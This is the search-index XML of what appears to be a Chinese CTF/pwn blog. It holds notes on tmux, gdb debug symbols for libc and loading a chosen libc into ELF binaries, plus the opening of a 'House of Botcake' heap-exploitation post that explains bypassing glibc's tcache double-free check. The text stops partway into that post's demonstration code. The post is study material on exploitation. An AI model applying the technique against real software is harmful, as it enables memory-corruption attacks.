-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlocal-search.xml
121 lines (57 loc) · 49 KB
/
local-search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>tmux笔记</title>
<link href="/2021/08/08/tmux%E7%AC%94%E8%AE%B0/"/>
<url>/2021/08/08/tmux%E7%AC%94%E8%AE%B0/</url>
<content type="html"><![CDATA[<h1 id="tmux笔记"><a href="#tmux笔记" class="headerlink" title="tmux笔记"></a>tmux笔记</h1><h2 id="Session会话相关"><a href="#Session会话相关" class="headerlink" title="Session会话相关"></a>Session会话相关</h2><h3 id="命令"><a href="#命令" class="headerlink" title="命令"></a>命令</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 新建会话:</span><br>tmux [new -s 会话名 -n 窗口名]<br><br><span class="hljs-comment"># 接入会话:</span><br>tmux attach(at) [-t 会话名]<br><br><span class="hljs-comment"># 分离会话</span><br>tmux detach<br><br><span class="hljs-comment"># 列出会话:</span><br>tmux <span class="hljs-built_in">ls</span><br>tmux list-session<br><br><span class="hljs-comment"># 切换会话</span><br>tmux switch [-t 会话名]<br><br><span class="hljs-comment"># 重命名会话</span><br>tmux rename-session -t 0 <new-name><br><br><span class="hljs-comment"># 关闭会话:</span><br>tmux kill-session [-t 会话名]<br><br><span class="hljs-comment"># 关闭所有会话:</span><br>tmux <span class="hljs-built_in">ls</span> | grep : | <span class="hljs-built_in">cut</span> -d. -f1 | awk <span class="hljs-string">'{print substr($1, 0, length($1)-1)}'</span> | xargs -I{} tmux kill-session -t {}<br></code></pre></td></tr></table></figure><h3 id="快捷键"><a href="#快捷键" class="headerlink" title="快捷键"></a>快捷键</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sh">prefix :new<cr>启动新会话<br>prefix s列出所有会话<br>prefix $重命名当前会话<br>prefix d退出 tmux(tmux 仍在后台运行)<br></code></pre></td></tr></table></figure><h2 id="Windows窗口相关"><a href="#Windows窗口相关" class="headerlink" title="Windows窗口相关"></a>Windows窗口相关</h2><h3 id="命令-1"><a href="#命令-1" class="headerlink" title="命令"></a>命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 新建窗口</span><br>tmux new-window<br><br><span class="hljs-comment"># 新建一个指定名称的窗口</span><br>tmux new-window -n <window-name><br><br><span class="hljs-comment"># 切换到指定编号的窗口</span><br>tmux select-window -t <window-number><br><br><span class="hljs-comment"># 切换到指定名称的窗口</span><br>tmux select-window -t <window-name><br><br><span class="hljs-comment"># 交换3号和1号窗口</span><br>tmux swap-window -s 3 -t 1<br><br><span class="hljs-comment"># 交换当前和1号窗口</span><br>tmux swap-window -t 1<br><br><span class="hljs-comment"># 移动当前窗口到1号</span><br>tmux move-window -t 1<br><br><span class="hljs-comment"># 重命名窗口</span><br>tmux rename-window <new-name><br></code></pre></td></tr></table></figure><h3 id="快捷键-1"><a href="#快捷键-1" class="headerlink" title="快捷键"></a>快捷键</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 调整窗口排序</span><br>prefix c 创建新窗口<br>prefix w 列出所有窗口<br>prefix n 后一个窗口<br>prefix p 前一个窗口<br>prefix f 查找窗口<br>prefix , 重命名当前窗口<br>prefix &关闭当前窗口<br>prefix <number>切换到指定编号的窗口<br></code></pre></td></tr></table></figure><h2 id="Panes窗格相关"><a href="#Panes窗格相关" class="headerlink" title="Panes窗格相关"></a>Panes窗格相关</h2><h3 id="命令-2"><a href="#命令-2" class="headerlink" title="命令"></a>命令</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 当前窗格上移</span><br>tmux swap-pane -U<br><span class="hljs-comment"># 当前窗格下移</span><br>tmux swap-pane -D<br><br><span class="hljs-comment"># 划分上下两个窗格</span><br>tmux split-window<br><br><span class="hljs-comment"># 划分左右两个窗格</span><br>tmux split-window -h<br></code></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 光标切换到上方窗格</span><br>tmux select-pane -U<br><br><span class="hljs-comment"># 光标切换到下方窗格</span><br>tmux select-pane -D<br><br><span class="hljs-comment"># 光标切换到左边窗格</span><br>tmux select-pane -L<br><br><span class="hljs-comment"># 光标切换到右边窗格</span><br>tmux select-pane -R<br></code></pre></td></tr></table></figure><h3 id="快捷键-2"><a href="#快捷键-2" class="headerlink" title="快捷键"></a>快捷键</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 同步窗格</span><br>prefix :setw synchronize-panes<br></code></pre></td></tr></table></figure><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 调整窗格尺寸</span><br>prefix :resize-pane -D 当前窗格向下扩大 1 格<br>prefix :resize-pane -U 当前窗格向上扩大 1 格<br>prefix :resize-pane -L 当前窗格向左扩大 1 格<br>prefix :resize-pane -R 当前窗格向右扩大 1 格<br><br>prefix :resize-pane [-t N -L M] 编号为N的窗格向左扩大M格<br></code></pre></td></tr></table></figure><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs shell">prefix %划分左右两个窗格<br>prefix "划分上下两个窗格<br>prefix <arrow key>光标切换到其他窗格<br>prefix ;光标切换到上一个窗格<br>prefix o光标切换到下一个窗格<br>prefix {当前窗格与上一个窗格交换位置<br>prefix }当前窗格与下一个窗格交换位置<br>prefix Ctrl+o所有窗格向前移动一个位置,第一个窗格变成最后一个窗格<br>prefix Alt+o所有窗格向后移动一个位置,最后一个窗格变成第一个窗格<br>prefix x关闭当前窗格<br>prefix !将当前窗格拆分为一个独立窗口<br>prefix z当前窗格全屏显示,再使用一次会变回原来大小<br>prefix Ctrl+<arrow key>按箭头方向调整窗格大小<br>prefix q显示窗格编号<br></code></pre></td></tr></table></figure><h2 id="杂项"><a href="#杂项" class="headerlink" title="杂项"></a>杂项</h2><h3 id="命令-3"><a href="#命令-3" class="headerlink" title="命令"></a>命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 列出所有快捷键,及其对应的 Tmux 命令</span><br>tmux list-keys<br><br><span class="hljs-comment"># 列出所有 Tmux 命令及其参数</span><br>tmux list-commands<br><br><span class="hljs-comment"># 列出当前所有 Tmux 会话的信息</span><br>tmux info<br><br><span class="hljs-comment"># 重新加载当前的 Tmux 配置</span><br>tmux source-file ~/.tmux.conf<br><br><span class="hljs-comment"># 退出</span><br><span class="hljs-built_in">exit</span> or Ctrl+d<br></code></pre></td></tr></table></figure><h3 id="快捷键-3"><a href="#快捷键-3" class="headerlink" title="快捷键"></a>快捷键</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sh">prefix t 窗口中央显示一个数字时钟<br>prefix ? 列出所有快捷键<br>prefix : 命令提示符<br></code></pre></td></tr></table></figure><h2 id="配置选项"><a href="#配置选项" class="headerlink" title="配置选项"></a>配置选项</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs sh"><span class="hljs-comment"># 鼠标支持 - 设置为 on 来启用鼠标(与 2.1 之前的版本有区别,请自行查阅 man page)</span><br><span class="hljs-built_in">set</span> -g mouse on<br><br><span class="hljs-comment"># 设置默认终端模式为 256color</span><br><span class="hljs-built_in">set</span> -g default-terminal <span class="hljs-string">"screen-256color"</span><br><br><span class="hljs-comment"># 启用活动警告</span><br>setw -g monitor-activity on<br><span class="hljs-built_in">set</span> -g visual-activity on<br><br><span class="hljs-comment"># 居中窗口列表</span><br><span class="hljs-built_in">set</span> -g status-justify centre<br><br><span class="hljs-comment"># 最大化/恢复窗格</span><br>unbind Up <span class="hljs-built_in">bind</span> Up new-window -d -n tmp \; swap-pane -s tmp.1 \; select-window -t tmp<br>unbind Down<br><span class="hljs-built_in">bind</span> Down last-window \; swap-pane -s tmp.1 \; kill-window -t tmp<br><br><span class="hljs-comment"># 文本复制模式</span><br>setw -g mode-keys vi<br></code></pre></td></tr></table></figure>]]></content>
<tags>
<tag>tmux</tag>
</tags>
</entry>
<entry>
<title>关于gdb带源码调试libc的问题和理解</title>
<link href="/2021/08/06/%E5%85%B3%E4%BA%8Egdb%E5%B8%A6%E6%BA%90%E7%A0%81%E8%B0%83%E8%AF%95libc%E7%9A%84%E9%97%AE%E9%A2%98%E5%92%8C%E7%90%86%E8%A7%A3/"/>
<url>/2021/08/06/%E5%85%B3%E4%BA%8Egdb%E5%B8%A6%E6%BA%90%E7%A0%81%E8%B0%83%E8%AF%95libc%E7%9A%84%E9%97%AE%E9%A2%98%E5%92%8C%E7%90%86%E8%A7%A3/</url>
<content type="html"><![CDATA[<h1 id="关于gdb带源码调试libc的问题和理解"><a href="#关于gdb带源码调试libc的问题和理解" class="headerlink" title="关于gdb带源码调试libc的问题和理解"></a>关于gdb带源码调试libc的问题和理解</h1><hr><h2 id="问题"><a href="#问题" class="headerlink" title="问题"></a>问题</h2><ol><li><p>dpkg -L libc6-dbg 可以看到是放在下图文件夹的,gdb是如何定位到的呢?<br> <img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806033728.png"></p></li><li><p>pwndbg能自动加载.debug文件下的带符号的libc.so的符号信息,如果改成debug文件夹则不会加载<br> <img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806034111.png"></p></li><li><p>add-symbol-file添加后无法使用<img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806035100.png"></p></li><li><p>不能直接指定libc.so为带符号版本的libc呢,如glibc-all-in-one中所示需要不带符号的和放入.debug文件夹的带符号的调试信息</p></li></ol><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210806035706.png"></p><hr><h2 id="解答"><a href="#解答" class="headerlink" title="解答"></a>解答</h2><ol><li><p>gdb symbol符号的定位机制</p><p>对于调试链接方式:</p><p>在可执行文件目录找不到的情况下会去全局调试目录的一个子目录里面找</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134223.png"></p><p>如图,当前查询的子目录是/usr/lib/debug/(pwd)(可执行文件的目录)/调试链接文件名</p></li><li><p>对于调试链接方式:</p><p>首先会在当前目录找,找不到去.debug目录,最后去全局目录</p></li><li><p>这个暂时不清楚,可能和pwndbg有关,导入的结构体之类的倒是能用了</p></li><li><p>因为符号文件只是包含符号信息,.text段没有内容</p><p>objdump -d -j .text xxx</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134717.png"></p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806134828.png"></p></li></ol><hr><h2 id="对于符号和调试信息的深入理解"><a href="#对于符号和调试信息的深入理解" class="headerlink" title="对于符号和调试信息的深入理解"></a>对于符号和调试信息的深入理解</h2><h3 id="gdb寻找符号的方式"><a href="#gdb寻找符号的方式" class="headerlink" title="gdb寻找符号的方式"></a>gdb寻找符号的方式</h3><p>gdb支持两种寻找符号文件的方式<sup id="fnref:1" class="footnote-ref"><a href="#fn:1" rel="footnote"><span class="hint--top hint--rounded" aria-label="https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html">[1]</span></a></sup>,分别为</p><ul><li>根据build-id在系统指定路径中查找</li><li>根据可执行程序中debug-link节在当前目录下查找</li></ul><h3 id="查看和修改debug-link节"><a href="#查看和修改debug-link节" class="headerlink" title="查看和修改debug-link节"></a>查看和修改debug-link节</h3><p>可使用objcopy修改libc文件中debug-link节中的内容,指向我们需要的dbg文件</p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820210806135408.png"></p><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">objcopy <span class="hljs-literal">--remove-section</span>=.gnu_debuglink libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so<br><span class="hljs-comment"># 首先删除已有的debuglink节</span><br>objcopy <span class="hljs-literal">--add-gnu-debuglink</span>=libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so.debug libc<span class="hljs-literal">-2</span>.<span class="hljs-number">23</span>.so<br></code></pre></td></tr></table></figure><h3 id="查看符号信息nm"><a href="#查看符号信息nm" class="headerlink" title="查看符号信息nm"></a>查看符号信息nm</h3><blockquote><p>nm -a 查看包含调试信息在内的符号信息</p><p>nm 查看符号信息</p><p>nm -D 只查看动态链接符号</p></blockquote><h3 id="判断一个文件是否有debug信息"><a href="#判断一个文件是否有debug信息" class="headerlink" title="判断一个文件是否有debug信息"></a>判断一个文件是否有debug信息</h3><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/20210820191018160310264.png"></p><h3 id="debug信息的分离和合并以及使用"><a href="#debug信息的分离和合并以及使用" class="headerlink" title="debug信息的分离和合并以及使用"></a>debug信息的分离和合并以及使用</h3><h4 id="分离"><a href="#分离" class="headerlink" title="分离"></a>分离</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">strip --only-keep-debug main.debug<br><br>objcopy --strip-debug main<br>strip --strip-debug --strip-unneeded main<br><br>objcopy --add-gnu-debuglink main.debug main<br></code></pre></td></tr></table></figure><h4 id="合并"><a href="#合并" class="headerlink" title="合并"></a>合并</h4><p>elfutils包中的工具eu-unstrip</p><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit">eu-unstrip <span class="hljs-built_in">binary</span> <span class="hljs-built_in">binary</span>.dbg<br></code></pre></td></tr></table></figure><h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">gdb -s main.debug -e main<br></code></pre></td></tr></table></figure><h3 id="什么是符号,符号包括哪些类型?"><a href="#什么是符号,符号包括哪些类型?" class="headerlink" title="什么是符号,符号包括哪些类型?"></a>什么是符号,符号包括哪些类型?</h3><p>待补充</p><h3 id="debug信息中包含什么东西?"><a href="#debug信息中包含什么东西?" class="headerlink" title="debug信息中包含什么东西?"></a>debug信息中包含什么东西?</h3><p>待补充</p><h3 id="dwarf是什么文件?"><a href="#dwarf是什么文件?" class="headerlink" title="dwarf是什么文件?"></a>dwarf是什么文件?</h3><p>待补充</p><hr><h2 id="相关内容"><a href="#相关内容" class="headerlink" title="相关内容"></a>相关内容</h2><ol><li><a href="https://www.jianshu.com/p/1a966b62b3d4">使用带 debug symbol 的低版本 glibc</a></li><li><a href="https://xuanxuanblingbling.github.io/ctf/tools/2020/03/20/gdb/">gdb带源码调试libc</a></li><li><a href="https://ephrain.net/gdb-%E8%BC%89%E5%85%A5%E6%9F%90%E5%80%8B-library-%E7%9A%84-symbol-file/">載入某個 library 的 symbol file</a></li><li><a href="https://www.jianshu.com/p/7a1441e4f355">IDA 制作 sig文件 && gdb 导入符号表</a></li><li><a href="https://stackoverflow.com/questions/59913495/gdb-wont-load-shared-libs-symbols-not-even-libc-so-musl-when-loading-a-core">gdb-wont-load-shared-libs-symbols-not-even-libc-so-musl-when-loading-a-core</a></li><li><a href="http://www.360doc.com/content/20/0609/16/38701044_917408462.shtml">GDB调试二进制和符号表symbol分离的程序</a></li><li><a href="https://www.cnblogs.com/amethyst623/articles/1946499.html">目标文件格式分析工具</a></li></ol><section class="footnotes"><h2>参考</h2><div class="footnote-list"><ol><li><span id="fn:1" class="footnote-text"><span><a href="https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html">https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html</a><a href="#fnref:1" rev="footnote" class="footnote-backref"> ↩</a></span></span></li></ol></div></section>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>ELF文件加载指定libc</title>
<link href="/2021/08/05/ELF%E6%96%87%E4%BB%B6%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9Alibc/"/>
<url>/2021/08/05/ELF%E6%96%87%E4%BB%B6%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9Alibc/</url>
<content type="html"><![CDATA[<h1 id="ELF文件加载指定libc"><a href="#ELF文件加载指定libc" class="headerlink" title="ELF文件加载指定libc"></a>ELF文件加载指定libc</h1><hr><h2 id="使用工具"><a href="#使用工具" class="headerlink" title="使用工具"></a>使用工具</h2><ul><li><p>patchelf</p><ul><li><a href="https://github.com/NixOS/patchelf">https://github.com/NixOS/patchelf</a></li><li>对文件做patch,主要是修改硬编码在elf文件中的ld地址,libc的加载地址倒是可以用环境变量LD_PRELOAD修改</li></ul></li><li><p>glibc-all-in_one</p><ul><li><a href="https://github.com/matrix1001/glibc-all-in-one">https://github.com/matrix1001/glibc-all-in-one</a></li><li>主要用来下载包含debug的指定版本libc,当然你也可以用里面的extract自己从deb中提取,注意把dbg版本的deb提取出来的放在.debug就行</li><li>另外也有其他的带源码调试libc的方法<ul><li><a href="https://www.jianshu.com/p/ee1ad4044ef7">同时使用多种版本的libc && 编译libc</a></li><li><a href="https://blog.csdn.net/weixin_44164182/article/details/118678610">pwntools加载指定版本libc</a></li></ul></li></ul></li></ul><hr><h2 id="修改方法"><a href="#修改方法" class="headerlink" title="修改方法"></a>修改方法</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --set-interpreter /lib64/31-linux.so.2 ./a.out<br><br>patchelf --replace-needed libc.so.6 ~/2.31-0ubuntu9_amd64/libc-2.31.so ./a.out<br></code></pre></td></tr></table></figure><p>在<code>pwntools</code>中也可以直接指定:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python">gdb.debug([<span class="hljs-string">'./ld-2.23.so'</span>, <span class="hljs-string">'./0ctfbabyheap'</span>], <span class="hljs-string">'''</span><br><span class="hljs-string">b __libc_start_main</span><br><span class="hljs-string">c</span><br><span class="hljs-string">'''</span>, env={<span class="hljs-string">'LD_PRELOAD'</span>: <span class="hljs-string">'./libc-2.23.so'</span>})<br><span class="hljs-comment">#这里的第一个参数是argv,这里表明可执行程序可以是ld,他的参数是实际执行程序..理论上process应该也可以这样.</span><br>process([<span class="hljs-string">"/lib64/ld-linux-x86-64.so.2"</span>,<span class="hljs-string">"./a.out"</span>],env={<span class="hljs-string">'LD_PRELOAD'</span>:<span class="hljs-string">'./libc-2.23.so'</span>})<br><span class="hljs-comment">#当然也可以上脚本修改ld</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change_ld</span>(<span class="hljs-params">binary, ld</span>):<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.access(ld, os.R_OK):<br> log.failure(<span class="hljs-string">"Invalid path {} to ld"</span>.<span class="hljs-built_in">format</span>(ld))<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.access(binary, os.R_OK):<br> log.failure(<span class="hljs-string">"Invalid path {} to binary"</span>.<span class="hljs-built_in">format</span>(binary))<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br> binary = ELF(binary)<br> path = <span class="hljs-string">'./{}_{}'</span>.<span class="hljs-built_in">format</span>(os.path.basename(binary.path), ld.split(<span class="hljs-string">'.'</span>)[-<span class="hljs-number">2</span>])<br> <span class="hljs-keyword">if</span> os.access(path, os.F_OK):<br> os.remove(path)<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"remove exist file....."</span>)<br> <span class="hljs-keyword">return</span> ELF(path)<br> <span class="hljs-keyword">for</span> segment <span class="hljs-keyword">in</span> binary.segments:<br> <span class="hljs-keyword">if</span> segment.header[<span class="hljs-string">'p_type'</span>] == <span class="hljs-string">'PT_INTERP'</span>:<br> size = segment.header[<span class="hljs-string">'p_memsz'</span>]<br> addr = segment.header[<span class="hljs-string">'p_paddr'</span>]<br> data = segment.data()<br> <span class="hljs-keyword">if</span> size <= <span class="hljs-built_in">len</span>(ld):<br> log.failure(<span class="hljs-string">"Failed to change PT_INTERP from {} to {}"</span>.<br> <span class="hljs-built_in">format</span>(data, ld))<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br> binary.write(addr, ld.ljust(size, <span class="hljs-string">'\x00'</span>))<br> <span class="hljs-keyword">break</span><br> binary.save(path)<br> os.chmod(path, <span class="hljs-number">0b111000000</span>) <span class="hljs-comment">#rwx------</span><br> success(<span class="hljs-string">"PT_INTERP has changed from {} to {}. Using temp file {}"</span>.<span class="hljs-built_in">format</span>(data, ld, path))<br> <span class="hljs-keyword">return</span> ELF(path)<br></code></pre></td></tr></table></figure><p>注意setuid类程序LD_PRELOAD不生效,另外在setuid程序中中调用exec族时</p><p>after <code>fork</code> and before <code>exec*</code>, setting</p><ul><li><code>setreuid</code> to the owner of the set-user-ID program</li><li><code>setregid</code> to the group of the set-group-ID program</li></ul>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>House of Botcake</title>
<link href="/2021/08/05/house_of_botcake/"/>
<url>/2021/08/05/house_of_botcake/</url>
<content type="html"><![CDATA[<h1 id="house-of-Botcake"><a href="#house-of-Botcake" class="headerlink" title="house of Botcake"></a>house of Botcake</h1><hr><h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><p>glibc>=2.26:</p><p>tcache (ubuntu 17.10) 之后引入的一种技术(<a href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc">commit</a>),目的是提升堆管理的性能。但提升性能的同时舍弃了很多安全检查,也因此有了很多新的利用方式。</p><p>存在UAF</p><h2 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h2><p>当块free进tcache之前没有use位的检查(fastbin也是)</p><p>通过unsortbin的consolidate绕过tcache的double free check</p><h2 id="利用示例"><a href="#利用示例" class="headerlink" title="利用示例"></a>利用示例</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><assert.h></span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-comment">/*</span><br><span class="hljs-comment"> * This attack should bypass the restriction introduced in</span><br><span class="hljs-comment"> * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d</span><br><span class="hljs-comment"> * If the 